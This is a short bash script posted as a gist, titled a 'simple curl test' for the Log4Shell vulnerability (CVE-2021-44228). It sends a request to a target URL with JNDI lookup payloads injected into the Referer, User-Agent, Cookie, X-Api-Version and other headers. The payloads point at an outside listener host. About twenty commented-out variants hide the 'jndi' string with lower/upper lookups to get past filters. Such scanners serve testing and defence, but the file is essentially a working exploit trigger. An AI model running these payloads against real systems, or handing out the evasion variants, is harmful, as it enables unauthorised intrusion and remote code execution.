@dustinbutterworth
Last active December 17, 2021 19:38
CVE-2021-44228 Simple Curl Test
#!/usr/bin/env bash
# Run with arguments like: ./CVE-2021-44228.sh aabbccddeeffgg.interact.sh https://test.com/test
LISTENER=$1
URL=$2
PAYLOAD='${jndi:ldap://'${LISTENER}'}'
# PAYLOAD='${jndi:${lower:l}${lower:d}a${lower:p}://'${LISTENER}''
# PAYLOAD='${j${k8s:k5:-ND}i${sd:k5:-:}ldap://'${LISTENER}'}'
# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://'${LISTENER}'} '
# PAYLOAD='${${::-j}ndi:rmi://'${LISTENER}'} '
# PAYLOAD='${jndi:rmi://'${LISTENER}'}'
# PAYLOAD='${${lower:jndi}:${lower:rmi}://'${LISTENER}'} '
# PAYLOAD='${${lower:${lower:jndi}}:${lower:rmi}://'${LISTENER}'} '
# PAYLOAD='${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://'${LISTENER}'}'
# PAYLOAD='${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://'${LISTENER}'}'
# PAYLOAD='${${upper:jndi}:${upper:rmi}://'${LISTENER}'} '
# PAYLOAD='${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://'${LISTENER}'}'
# PAYLOAD='${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${LISTENER}'}'
# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${LISTENER}'}'
echo "Listener: ${LISTENER}"
echo "URL: ${URL}"
echo "Payload: ${PAYLOAD}"
# -k skips TLS certificate verification and -L follows redirects.
# The request is sent through a local proxy on 127.0.0.1:8080, which must be listening or curl fails.
curl -k -L "${URL}" \
-H 'Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1' \
-H 'Accept-Encoding: gzip, deflate' \
-H "Accept-Language: ${PAYLOAD}" \
-H 'Connection: close' \
-H "Referer: ${PAYLOAD}" \
-H "X-Api-Version: ${PAYLOAD}" \
-H "Cookie: ${PAYLOAD}=${PAYLOAD};JSESSIONID=${PAYLOAD};SESSIONID=${PAYLOAD};PHPSESSID=${PAYLOAD};token=${PAYLOAD};session=${PAYLOAD}" \
-H "User-Agent: ${PAYLOAD}" \
-H 'Pragma: no-cache' \
-H "If-Modified-Since: ${PAYLOAD}" \
-H "Accept: ${PAYLOAD}" \
--proxy http://127.0.0.1:8080